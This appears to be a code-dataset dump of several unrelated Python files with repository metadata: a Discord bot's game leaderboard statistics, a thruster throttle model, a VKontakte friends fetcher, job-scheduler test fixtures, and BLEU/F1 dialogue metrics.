json.dump(leaderboard_data, file, indent=4)
log.debug("Sleeping for 10s")
# time.sleep(10)
await asyncio.sleep(10)
log.debug(f"Finished Map #{i + 1}")
await api_client.close()
@staticmethod
def get_player_list(map_no: str, year: str = "2021", season: str = "Fall"):
log.debug(f"Opening File, Map No -> {map_no}")
with open(
f"./bot/resources/leaderboard/{year}/{season.lower()}/{map_no}.json",
"r",
encoding="UTF-8",
) as file:
data = json.load(file)
player_list = []
log.debug("Appending Players")
for player in data:
player_list.append((player["player"]["name"], player["position"]))
return player_list
@staticmethod
def get_player_good_maps(
player_name: str, year: str = "2021", season: str = "Fall"
) -> discord.Embed:
log.debug(f"Getting Player Details for Player name -> {player_name}")
player_embed = EZEmbed.create_embed(
title=f"{player_name} is good at the following maps",
color=Commons.get_random_color(),
)
t100_str, t200_str, t300_str, t400_str, t500_str = "", "", "", "", ""
for i in range(6, 26, 1):
player_list = Leaderboards.get_player_list(str(i), year, season.lower())
for player_tuple in player_list:
if player_tuple[0].lower() == player_name.lower():
if int(player_tuple[1]) <= 100:
log.debug(f"{player_name} is a top 100 player for Map {i}")
t100_str = (
t100_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
elif int(player_tuple[1]) <= 200 and int(player_tuple[1]) > 100:
log.debug(f"{player_name} is a top 200 player for Map {i}")
t200_str = (
t200_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
elif int(player_tuple[1]) <= 300 and int(player_tuple[1]) > 200:
log.debug(f"{player_name} is a top 300 player for Map {i}")
t300_str = (
t300_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
elif int(player_tuple[1]) <= 400 and int(player_tuple[1]) > 300:
log.debug(f"{player_name} is a top 400 player for Map {i}")
t400_str = (
t400_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
elif int(player_tuple[1]) <= 500 and int(player_tuple[1]) > 400:
log.debug(f"{player_name} is a top 500 player for Map {i}")
t500_str = (
t500_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
if t100_str != "":
log.debug(f"Appending T100 String for {player_name}")
player_embed.add_field(
name="**Top 100**", value="```" + t100_str + "```", inline=False
)
else:
log.debug("Player does not have any top 100 ranks")
player_embed.add_field(
name="**Top 100**",
value="Player does not have any top 100 times for maps 06-25",
inline=False,
)
if t200_str != "":
log.debug(f"Appending Top 100 String for {player_name}")
player_embed.add_field(
name="**Top 200**", value="```" + t200_str + "```", inline=False
)
else:
log.debug("Player does not have any top 200 ranks")
player_embed.add_field(
name="**Top 200**",
value="Player does not have any top 200 times for maps 06-25",
inline=False,
)
if t300_str != "":
log.debug(f"Appending Top 100 String for {player_name}")
player_embed.add_field(
name="**Top 300**", value="```" + t300_str + "```", inline=False
)
else:
log.debug("Player does not have any top 300 ranks")
player_embed.add_field(
name="**Top 300**",
value="Player does not have any top 300 times for maps 06-25",
inline=False,
)
if t400_str != "":
log.debug(f"Appending Top 100 String for {player_name}")
player_embed.add_field(
name="**Top 400**", value="```" + t400_str + "```", inline=False
)
else:
log.debug("Player does not have any top 400 ranks")
player_embed.add_field(
name="**Top 400**",
value="Player does not have any top 400 times for maps 06-25",
inline=False,
)
if t500_str != "":
log.debug(f"Appending Top 100 String for {player_name}")
player_embed.add_field(
name="**Top 500**", value="```" + t500_str + "```", inline=False
)
else:
log.debug("Player does not have any top 500 ranks")
player_embed.add_field(
name="**Top 500**",
value="Player does not have any top 500 times for maps 06-25",
inline=False,
)
return player_embed
class COTDUtil:
@staticmethod
def get_best_rank_primary(cotd_data) -> int:
log.debug(
"Getting Best Primary Best Rank -> {}".format(
cotd_data["stats"]["bestprimary"]["bestrank"]
)
)
return cotd_data["stats"]["bestprimary"]["bestrank"]
@staticmethod
def get_best_div_primary(cotd_data) -> int:
log.debug(
"Getting Primary Best Div -> {}".format(
cotd_data["stats"]["bestprimary"]["bestdiv"]
)
)
return cotd_data["stats"]["bestprimary"]["bestdiv"]
@staticmethod
def get_best_rank_primary_time(cotd_data) -> int:
log.debug(
"Getting the time of Primary Best -> {}".format(
cotd_data["stats"]["bestprimary"]["bestranktime"]
)
)
return cotd_data["stats"]["bestprimary"]["bestranktime"]
@staticmethod
def get_best_div_primary_time(cotd_data) -> int:
log.debug(
"Getting the time of Primary Best Div -> {}".format(
cotd_data["stats"]["bestprimary"]["bestdivtime"]
)
)
return cotd_data["stats"]["bestprimary"]["bestdivtime"]
@staticmethod
def get_best_div_rank_primary(cotd_data) -> int:
log.debug(
"Getting the Best Rank in Div -> {}".format(
cotd_data["stats"]["bestprimary"]["bestrankindiv"]
)
)
return cotd_data["stats"]["bestprimary"]["bestrankindiv"]
@staticmethod
def get_best_rank_overall(cotd_data) -> int:
log.debug(
"Getting the Overall Best Rank -> {}".format(
cotd_data["stats"]["bestoverall"]["bestrank"]
)
)
return cotd_data["stats"]["bestoverall"]["bestrank"]
@staticmethod
def get_best_div_overall(cotd_data) -> int:
log.debug(
"Getting the Overall Best Div -> {}".format(
cotd_data["stats"]["bestoverall"]["bestdiv"]
)
)
return cotd_data["stats"]["bestoverall"]["bestdiv"]
@staticmethod
def get_best_rank_overall_time(cotd_data) -> int:
log.debug(
f'Getting the time of Overall Best Rank -> {cotd_data["stats"]["bestoverall"]["bestranktime"]}'
)
return cotd_data["stats"]["bestoverall"]["bestranktime"]
@staticmethod
def get_best_div_overall_time(cotd_data) -> int:
log.debug(
"Getting the time of Overall Best Div -> {}".format(
cotd_data["stats"]["bestoverall"]["bestdivtime"]
)
)
return cotd_data["stats"]["bestoverall"]["bestdivtime"]
@staticmethod
def get_best_div_rank_overall(cotd_data) -> int:
log.debug(
"Getting the Best Rank in Div Overall -> {}".format(
cotd_data["stats"]["bestoverall"]["bestrankindiv"]
)
)
return cotd_data["stats"]["bestoverall"]["bestrankindiv"]
@staticmethod
def return_cotds(cotd_data):
log.debug("Returning all COTDs")
return cotd_data["cotds"]
@staticmethod
def return_cotds_without_reruns(cotd_data):
log.debug("Returning COTDs without reruns")
cotds_safe = []
for cotd in cotd_data["cotds"]:
if "#2" in cotd["name"] or "#3" in cotd["name"]:
continue
cotds_safe.append(cotd)
return cotds_safe
@staticmethod
def get_num_cotds_played(cotds):
log.debug(f"Number of COTDs Played -> {len(cotds)}")
return len(cotds)
@staticmethod
def remove_unfinished_cotds(cotds):
log.debug("Looping around COTDs")
cotds_safe = []
for cotd in cotds:
if not cotd["score"] == 0:
cotds_safe.append(cotd)
log.debug(f"{len(cotds_safe)} COTDs Finished out of Given Set")
return cotds_safe
@staticmethod
def get_average_rank_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
rank_total = 0
# Looping Through COTDs
for cotd in cotds:
rank_total += int(cotd["rank"])
log.debug(f"Average Rank Overall -> {round(rank_total / cotds_played, 2)}")
return round(rank_total / cotds_played, 2)
@staticmethod
def get_average_rank_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
rank_total = 0
for cotd in cotds:
rank_total += int(cotd["rank"])
try:
log.debug(f"Average Rank Primary -> {round(rank_total / cotds_played, 2)}")
return round(rank_total / cotds_played, 2)
except:
log.debug("Average Rank Primary -> 0")
return 0
@staticmethod
def get_average_div_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
div_total = 0
# Looping Through COTDs
for cotd in cotds:
div_total += int(cotd["div"])
log.debug(f"Average Div Overall -> {round(div_total / cotds_played, 2)}")
return round(div_total / cotds_played, 2)
@staticmethod
def get_average_div_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
div_total = 0
for cotd in cotds:
div_total += int(cotd["div"])
try:
log.debug(f"Average Div Primary -> {round(div_total / cotds_played, 2)}")
return round(div_total / cotds_played, 2)
except:
log.debug("Average Div Primary -> 0")
return 0
@staticmethod
def get_average_div_rank_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
div_rank_total = 0
for cotd in cotds:
div_rank_total += int(cotd["div"])
log.debug(
f"Average Div Rank Overall -> {round(div_rank_total / cotds_played, 2)}"
)
return round(div_rank_total / cotds_played, 2)
@staticmethod
def get_average_div_rank_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
div_rank_total = 0
for cotd in cotds:
div_rank_total += int(cotd["divrank"])
try:
log.debug(
f"Average Div Rank Primary -> {round(div_rank_total / cotds_played, 2)}"
)
return round(div_rank_total / cotds_played, 2)
except:
log.debug("Average Div Rank Primary -> 0")
return 0
@staticmethod
def get_list_of_ranks_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
ranks = []
for cotd in cotds:
ranks.append(cotd["rank"])
log.debug(f"Ranks are {ranks[::-1]}")
return ranks[::-1]
@staticmethod
def get_list_of_ranks_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
ranks = []
for cotd in cotds:
ranks.append(cotd["rank"])
log.debug(f"Ranks are {ranks[::-1]}")
return ranks[::-1]
@staticmethod
def get_list_of_dates_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
timestamps = []
for cotd in cotds:
timestamps.append(cotd["name"][15:])
log.debug(f"Timestamps are {timestamps[::-1]}")
return timestamps[::-1]
@staticmethod
def get_list_of_dates_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
timestamps = []
for cotd in cotds:
timestamps.append(cotd["name"][15:])
log.debug(f"Timestamps are {timestamps[::-1]}")
return timestamps[::-1]
@staticmethod
def get_list_of_ids_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
ids = []
for cotd in cotds:
ids.append(cotd["id"])
log.debug(f"IDs are {ids[::-1]}")
return ids[::-1]
@staticmethod
def get_list_of_ids_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
ids = []
for cotd in cotds:
ids.append(cotd["id"])
log.debug(f"IDs are {ids[::-1]}")
return ids[::-1]
@staticmethod
def get_num_wins(cotd_data):
log.debug(
"Getting number of wins -> {}".format(cotd_data["stats"]["totalwins"])
)
return cotd_data["stats"]["totalwins"]
@staticmethod
def _create_rank_plot(
ranks: list, dates: list, ids: list, plot_name: str, image_name: str
):
log.debug("Clearing Plot")
plt.clf()
if len(dates) >= 40:
log.debug(
f"{plot_name} -> Player has played more than 40 COTDs, using ids instead of dates"
)
plt.plot(ids, ranks, label=plot_name)
plt.xlabel("COTD IDs")
else:
log.debug(
f"{plot_name} -> Player has less than 40 COTDs, using dates instead of ids"
)
plt.plot(dates, ranks, label=plot_name)
plt.xlabel("COTD Dates")
log.debug(f"{plot_name} -> Setting Plot Rotation to 90Deg")
plt.xticks(rotation=90)
log.debug(f"{plot_name} -> Setting YLabel to Ranks")
plt.ylabel("Ranks")
log.debug(f"{plot_name} -> Setting title to {plot_name}")
plt.title(f"Rank Graph for {plot_name}")
log.debug(f"{plot_name} -> Setting Tight Layout")
plt.tight_layout()
log.debug(f"{plot_name} -> Saving the Plot to Computer")
plt.savefig("./bot/resources/temp/" + image_name)
@staticmethod
def _concat_graphs():
log.info("Concatenating Graphs")
log.debug("Opening First Graph")
first_graph = cv2.imread("./bot/resources/temp/overallranks.png")
log.debug("First Graph Opened")
log.debug("Opening Second Graph")
second_graph = cv2.imread("./bot/resources/temp/primaryranks.png")
log.debug("Second Graph Opened")
log.debug("Concatenating Graphs")
concatenated_graphs = cv2.hconcat([first_graph, second_graph])
log.debug("Concatenated Graphs")
log.info("Saving Graphs")
cv2.imwrite("./bot/resources/temp/concatenated_graphs.png", concatenated_graphs)
class NotAValidUsername(Exception):
"""Raised when the Username given is not valid.
Args:
Exception ([type]): [description]
"""
def __init__(self, excp: Exception):
self.message = excp.message
def __str__(self):
return self.message if self.message is not None else None
| 35.756569 | 195 | 0.578832 | 45,807 | 0.990015 | 0 | 0 | 25,094 | 0.54235 | 16,164 | 0.349348 | 15,656 | 0.338369 |
1fed6ebbcca1ccb5af62d7ab28474d73bafe114f
| 4,535 |
py
|
Python
|
src/vehicle_core/model/throttle_model.py
|
decabyte/vehicle_core
|
623e1e993445713ab2ba625ac54be150077c2f1e
|
[
"BSD-3-Clause"
] | 1 |
2016-12-14T11:48:02.000Z
|
2016-12-14T11:48:02.000Z
|
src/vehicle_core/model/throttle_model.py
|
decabyte/vehicle_core
|
623e1e993445713ab2ba625ac54be150077c2f1e
|
[
"BSD-3-Clause"
] | null | null | null |
src/vehicle_core/model/throttle_model.py
|
decabyte/vehicle_core
|
623e1e993445713ab2ba625ac54be150077c2f1e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Software License Agreement (BSD License)
#
# Copyright (c) 2014, Ocean Systems Laboratory, Heriot-Watt University, UK.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Heriot-Watt University nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Original authors:
# Valerio De Carolis, Marian Andrecki, Corina Barbalata, Gordon Frost
from __future__ import division
import numpy as np
import scipy as sci
import scipy.signal
##pythran export predict_throttle(float[], float[], float[], float, float)
def predict_throttle(throttle_request, b, a, offset, limit):
"""This function returns the predicted throttle for each thruster given a throttle request using a low-pass filter
IIR filtering. See (http://en.wikipedia.org/wiki/Infinite_impulse_response) for more details.
The use of scipy is not possible if the pythran optimizer is employed with this module.
:param throttle_request: matrix of throttle request (N x M) (rows are different thrusters and columns are samples)
:param b: low-pass filter b coefficients
:param a: low-pass filter a coefficients
:param offset: samples offset in the throttle request
:param limit: throttle value hard limit
:return: throttle_model is the predicted value of the throttle
"""
# apply latency delay (offset is positive)
throttle_delayed = throttle_request[:, 0:-(offset + 1)]
throttle_model = np.zeros_like(throttle_delayed)
# apply low-pass filter (using scipy)
throttle_model = sci.signal.lfilter(b, a, throttle_delayed)
# # apply low-pass filter (using custom implementation)
# P = len(b)
# Q = len(a)
# N = throttle_delayed.shape[0]
# M = throttle_delayed.shape[1]
# K = np.maximum(P, Q)
#
# for i in xrange(N):
# for j in xrange(K, M):
#
# x = throttle_delayed[i, j-P:j]
# y = throttle_model[i, j-Q:j-1]
#
# throttle_model[i,j] = (np.sum(b[::-1] * x) - np.sum(a[:0:-1] * y)) / a[0]
# calculate the result and apply limits
return np.clip(throttle_model[:,-1], -limit, limit)
##pythran export rate_limiter(float[], float[], float, float)
def rate_limiter(new_throttle, last_throttle, rising_limit, falling_limit):
"""Models the change in thruster's throttle.
http://www.mathworks.co.uk/help/simulink/slref/ratelimiter.html
:param last_throttle: result of a previous iteration
:param new_throttle:
:param rising_limit: rising rate limit between two samples
:param falling_limit: falling rate limit between two samples
:return: next_throttle: the new throttle after applying rate limits
"""
diff_throttle = new_throttle - last_throttle
next_throttle = np.zeros_like(new_throttle)
for i, dth in enumerate(diff_throttle):
if dth > rising_limit:
next_throttle[i] = last_throttle[i] + rising_limit
elif dth < -falling_limit:
next_throttle[i] = last_throttle[i] - falling_limit
else:
next_throttle[i] = new_throttle[i]
return next_throttle
| 40.855856 | 118 | 0.714443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,508 | 0.773539 |
1fee9ed72e23e0f9892bd14d8b33f1a360d24471
| 1,605 |
py
|
Python
|
social_friends_finder/backends/vkontakte_backend.py
|
haremmaster/django-social-friends-finder
|
cad63349b19b3c301626c24420ace13c63f45ad7
|
[
"BSD-3-Clause"
] | 19 |
2015-01-01T16:23:06.000Z
|
2020-01-02T22:42:17.000Z
|
social_friends_finder/backends/vkontakte_backend.py
|
haremmaster/django-social-friends-finder
|
cad63349b19b3c301626c24420ace13c63f45ad7
|
[
"BSD-3-Clause"
] | 2 |
2015-01-01T16:34:59.000Z
|
2015-03-26T10:30:59.000Z
|
social_friends_finder/backends/vkontakte_backend.py
|
laplacesdemon/django-social-friends-finder
|
cad63349b19b3c301626c24420ace13c63f45ad7
|
[
"BSD-3-Clause"
] | 11 |
2015-01-16T18:39:34.000Z
|
2021-08-13T00:46:41.000Z
|
from social_friends_finder.backends import BaseFriendsProvider
from social_friends_finder.utils import setting
if not setting("SOCIAL_FRIENDS_USING_ALLAUTH", False):
from social_auth.backends.contrib.vk import VKOAuth2Backend
USING_ALLAUTH = False
else:
from allauth.socialaccount.models import SocialToken, SocialAccount, SocialApp
USING_ALLAUTH = True
import vkontakte
class VKontakteFriendsProvider(BaseFriendsProvider):
def fetch_friends(self, user):
"""
fethces friends from VKontakte using the access_token
fethched by django-social-auth.
Note - user isn't a user - it's a UserSocialAuth if using social auth, or a SocialAccount if using allauth
Returns:
collection of friend objects fetched from VKontakte
"""
if USING_ALLAUTH:
raise NotImplementedError("VKontakte support is not implemented for django-allauth")
#social_app = SocialApp.objects.get_current('vkontakte')
#oauth_token = SocialToken.objects.get(account=user, app=social_app).token
else:
social_auth_backend = VKOAuth2Backend()
# Get the access_token
tokens = social_auth_backend.tokens(user)
oauth_token = tokens['access_token']
api = vkontakte.API(token=oauth_token)
return api.get("friends.get")
def fetch_friend_ids(self, user):
"""
fetches friend id's from vkontakte
Return:
collection of friend ids
"""
friend_ids = self.fetch_friends(user)
return friend_ids
| 33.4375 | 114 | 0.684112 | 1,215 | 0.757009 | 0 | 0 | 0 | 0 | 0 | 0 | 693 | 0.431776 |
1feefa448dd4d27276c85f5a38d04e04d811d4b4
| 56 |
py
|
Python
|
tests/cms_bundles/__init__.py
|
ff0000/scarlet
|
6c37befd810916a2d7ffff2cdb2dab57bcb6d12e
|
[
"MIT"
] | 9 |
2015-10-13T04:35:56.000Z
|
2017-03-16T19:00:44.000Z
|
tests/cms_bundles/__init__.py
|
ff0000/scarlet
|
6c37befd810916a2d7ffff2cdb2dab57bcb6d12e
|
[
"MIT"
] | 32 |
2015-02-10T21:09:18.000Z
|
2017-07-18T20:26:51.000Z
|
tests/cms_bundles/__init__.py
|
ff0000/scarlet
|
6c37befd810916a2d7ffff2cdb2dab57bcb6d12e
|
[
"MIT"
] | 3 |
2017-07-13T13:32:21.000Z
|
2019-04-08T20:18:58.000Z
|
default_app_config = 'tests.cms_bundles.apps.AppConfig'
| 28 | 55 | 0.839286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.607143 |
1ff9642e37e0136fb4ef1901be1925b6d57a71f4
| 2,543 |
py
|
Python
|
app/test/commonJSONStrings.py
|
rmetcalf9/dockJob
|
a61acf7ca52e37ff513695a5cc201d346fb4a7fa
|
[
"MIT"
] | 14 |
2018-03-28T20:37:56.000Z
|
2020-08-30T13:29:05.000Z
|
app/test/commonJSONStrings.py
|
rmetcalf9/dockJob
|
a61acf7ca52e37ff513695a5cc201d346fb4a7fa
|
[
"MIT"
] | 79 |
2018-02-07T14:42:00.000Z
|
2022-02-11T22:30:03.000Z
|
app/test/commonJSONStrings.py
|
rmetcalf9/dockJob
|
a61acf7ca52e37ff513695a5cc201d346fb4a7fa
|
[
"MIT"
] | 6 |
2018-05-08T21:49:40.000Z
|
2021-07-30T13:47:37.000Z
|
data_simpleJobCreateParams = {
"name": "TestJob",
"repetitionInterval": "HOURLY:03",
"command": "ls",
"enabled": True
}
data_simpleManualJobCreateParams = {
"name": "TestJob",
"repetitionInterval": "",
"command": "ls",
"enabled": False
}
data_simpleJobCreateExpRes = {
"guid": 'IGNORE',
"name": data_simpleJobCreateParams['name'],
"command": data_simpleJobCreateParams['command'],
"enabled": data_simpleJobCreateParams['enabled'],
"repetitionInterval": data_simpleJobCreateParams['repetitionInterval'],
"nextScheduledRun": 'IGNORE',
"creationDate": "IGNORE",
"lastUpdateDate": "IGNORE",
"lastRunDate": None,
"lastRunReturnCode": None,
"lastRunExecutionGUID": "",
"mostRecentCompletionStatus": "Unknown",
"pinned": False,
"overrideMinutesBeforeMostRecentCompletionStatusBecomesUnknown": None,
"AfterFailJobGUID": None,
"AfterFailJobNAME": None,
"AfterSuccessJobGUID": None,
"AfterSuccessJobNAME": None,
"AfterUnknownJobGUID": None,
"AfterUnknownJobNAME": None,
"StateChangeSuccessJobGUID": None,
"StateChangeSuccessJobNAME": None,
"StateChangeFailJobGUID": None,
"StateChangeFailJobNAME": None,
"StateChangeUnknownJobGUID": None,
"StateChangeUnknownJobNAME": None,
"objectVersion": 1
}
data_simpleManualJobCreateParamsWithAllOptionalFields = dict(data_simpleJobCreateParams)
data_simpleManualJobCreateParamsWithAllOptionalFields['pinned'] = True
data_simpleManualJobCreateParamsWithAllOptionalFields['overrideMinutesBeforeMostRecentCompletionStatusBecomesUnknown'] = 357
data_simpleManualJobCreateParamsWithAllOptionalFields['StateChangeSuccessJobGUID'] = '' #Can't provide valid non default value as other jobs don't exist
data_simpleManualJobCreateParamsWithAllOptionalFields['StateChangeFailJobGUID'] = '' #
data_simpleManualJobCreateParamsWithAllOptionalFields['StateChangeUnknownJobGUID'] = '' #
data_simpleManualJobCreateParamsWithAllOptionalFieldsExpRes = dict(data_simpleJobCreateExpRes)
data_simpleManualJobCreateParamsWithAllOptionalFieldsExpRes['pinned'] = True
data_simpleManualJobCreateParamsWithAllOptionalFieldsExpRes['overrideMinutesBeforeMostRecentCompletionStatusBecomesUnknown'] = 357
data_simpleJobExecutionCreateExpRes = {
"guid": 'IGNORE',
"stage": 'Pending',
"executionName": 'TestExecutionName',
"resultReturnCode": 0,
"jobGUID": 'OVERRIDE',
"jobName": 'TestJob',
"jobCommand": 'OVERRIDE',
"resultSTDOUT": '',
"manual": True,
"dateCreated": 'IGNORE',
"dateStarted": 'IGNORE',
"dateCompleted": 'IGNORE'
}
| 35.319444 | 152 | 0.773889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,278 | 0.502556 |
1ff9b69a4019a1762d86b4de69764598a30ea2b6
| 8,228 |
py
|
Python
|
dial/metrics.py
|
neukg/KAT-TSLF
|
91bff10312ba5fbbd46978b268a1c97a5d627dcd
|
[
"MIT"
] | 11 |
2021-11-19T06:17:10.000Z
|
2022-03-11T07:12:30.000Z
|
dial/metrics.py
|
neukg/KAT-TSLF
|
91bff10312ba5fbbd46978b268a1c97a5d627dcd
|
[
"MIT"
] | 3 |
2021-11-20T14:00:24.000Z
|
2022-03-03T19:41:01.000Z
|
dial/metrics.py
|
neukg/KAT-TSLF
|
91bff10312ba5fbbd46978b268a1c97a5d627dcd
|
[
"MIT"
] | null | null | null |
from nltk.translate.bleu_score import corpus_bleu, sentence_bleu, SmoothingFunction
from nltk import word_tokenize
# import language_evaluation
from typing import List
from collections import defaultdict, Counter
import re
import math
import sys
def mean(lst):
return sum(lst) / len(lst)
def _calc_ngram_dict(tokens:List[str], ngram:int, dict_ref=None):
ngram_dict = defaultdict(int) if dict_ref is None else dict_ref
total = len(tokens)
for i in range(0, total - ngram + 1):
item = tuple(tokens[i:i + ngram])
ngram_dict[item] += 1
return ngram_dict
def _calc_cover(cand, gold, ngram):
cand_dict = _calc_ngram_dict(cand, ngram)
gold_dict = _calc_ngram_dict(gold, ngram)
cover = 0
total = 0
for token, freq in cand_dict.items():
if token in gold_dict:
cover += min(freq, gold_dict[token])
total += freq
return cover, total
def _calc_cover_rate(cands, golds, ngram):
"""
calc_cover_rate
"""
cover = 0.0
total = 0.000001
for cand_tokens, gold_tokens in zip(cands, golds):
cur_cover, cur_total = _calc_cover(cand_tokens, gold_tokens, ngram)
cover += cur_cover
total += cur_total
return cover / total
def _calc_bp(cands, golds):
c_count = 0.000001
r_count = 0.0
for cand_tokens, gold_tokens in zip(cands, golds):
c_count += len(cand_tokens)
r_count += len(gold_tokens)
bp = 1
if c_count < r_count:
bp = math.exp(1 - r_count / c_count)
return bp
def calc_corpus_bleu(cands, golds):
bp = _calc_bp(cands, golds)
cover_rate1 = _calc_cover_rate(cands, golds, 1)
cover_rate2 = _calc_cover_rate(cands, golds, 2)
cover_rate3 = _calc_cover_rate(cands, golds, 3)
bleu1 = 0
bleu2 = 0
bleu3 = 0
if cover_rate1 > 0:
bleu1 = bp * math.exp(math.log(cover_rate1))
if cover_rate2 > 0:
bleu2 = bp * math.exp((math.log(cover_rate1) + math.log(cover_rate2)) / 2)
if cover_rate3 > 0:
bleu3 = bp * math.exp((math.log(cover_rate1) + math.log(cover_rate2) + math.log(cover_rate3)) / 3)
return bleu1, bleu2, bleu3
# def calc_corpus_bleu_new(cands, golds):
# golds = [[gold] for gold in golds]
# sf = SmoothingFunction().method7
# bleu1 = corpus_bleu(golds, cands, smoothing_function=sf, weights=[1, 0, 0, 0])
# bleu2 = corpus_bleu(golds, cands, smoothing_function=sf, weights=[0.5, 0.5, 0, 0])
# bleu3 = corpus_bleu(golds, cands, smoothing_function=sf, weights=[0.34, 0.33, 0.33, 0])
# return bleu1, bleu2, bleu3
def calc_sentence_bleu(cands, golds):
bleu1 = []
bleu2 = []
bleu3 = []
sf = SmoothingFunction().method7
for hyp, ref in zip(cands, golds):
try:
b1 = sentence_bleu([ref], hyp, smoothing_function=sf, weights=[1, 0, 0, 0])
except ZeroDivisionError:
b1 = 0.0
try:
b2 = sentence_bleu([ref], hyp, smoothing_function=sf, weights=[0.5, 0.5, 0, 0])
except ZeroDivisionError:
b2 = 0.0
try:
b3 = sentence_bleu([ref], hyp, smoothing_function=sf, weights=[0.34, 0.33, 0.33, 0])
except ZeroDivisionError:
b3 = 0.0
bleu1.append(b1)
bleu2.append(b2)
bleu3.append(b3)
return mean(bleu1), mean(bleu2), mean(bleu3)
def calc_corpus_bleu_new(hypothesis, references):
# hypothesis = [normalize_answer(hyp).split(" ") for hyp in hypothesis]
# references = [[normalize_answer(ref).split(" ")] for ref in references]
references = [[gold] for gold in references]
sf = SmoothingFunction(epsilon=1e-12).method1
b1 = corpus_bleu(references, hypothesis, weights=(1.0/1.0,), smoothing_function=sf)
b2 = corpus_bleu(references, hypothesis, weights=(1.0/2.0, 1.0/2.0), smoothing_function=sf)
b3 = corpus_bleu(references, hypothesis, weights=(1.0/3.0, 1.0/3.0, 1.0/3.0), smoothing_function=sf)
b4 = corpus_bleu(references, hypothesis, weights=(1.0/4.0, 1.0/4.0, 1.0/4.0, 1.0/4.0), smoothing_function=sf)
return b1, b2, b3, b4
def _calc_distinct_ngram(cands, ngram):
ngram_total = 0.00001
ngram_distinct_count = 0.00001
pred_dict = defaultdict(int)
for cand_tokens in cands:
_calc_ngram_dict(cand_tokens, ngram, pred_dict)
for key, freq in pred_dict.items():
ngram_total += freq
ngram_distinct_count += 1
return ngram_distinct_count / ngram_total
def _calc_sent_distinct_ngram(cand, ngram):
ngram_total = 0.0000000001
ngram_distinct_count = 0.0
ngram_dict = defaultdict(int)
for i in range(0, len(cand) - ngram + 1):
item = tuple(cand[i:i + ngram])
ngram_dict[item] += 1
for _, freq in ngram_dict.items():
ngram_total += freq
ngram_distinct_count += 1
return ngram_distinct_count / ngram_total
def calc_corpus_distinct(cands):
distinct1 = _calc_distinct_ngram(cands, 1)
distinct2 = _calc_distinct_ngram(cands, 2)
return distinct1, distinct2
def calc_sentence_distinct(cands):
distinct1 = mean([_calc_sent_distinct_ngram(c, 1) for c in cands])
distinct2 = mean([_calc_sent_distinct_ngram(c, 2) for c in cands])
return distinct1, distinct2
def calc_corpus_f1(cands, golds):
golden_word_total = 0.00000001
pred_word_total = 0.00000001
hit_word_total = 0.00000001
for response, golden_response in zip(cands, golds):
common = Counter(response) & Counter(golden_response)
hit_word_total += sum(common.values())
golden_word_total += len(golden_response)
pred_word_total += len(response)
p = hit_word_total / pred_word_total
r = hit_word_total / golden_word_total
f1 = 2 * p * r / (p + r)
return f1
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
re_art = re.compile(r'\b(a|an|the)\b')
re_punc = re.compile(r'[!"#$%&()*+,-./:;<=>?@\[\]\\^`{|}~_\']')
def remove_articles(text):
return re_art.sub(' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
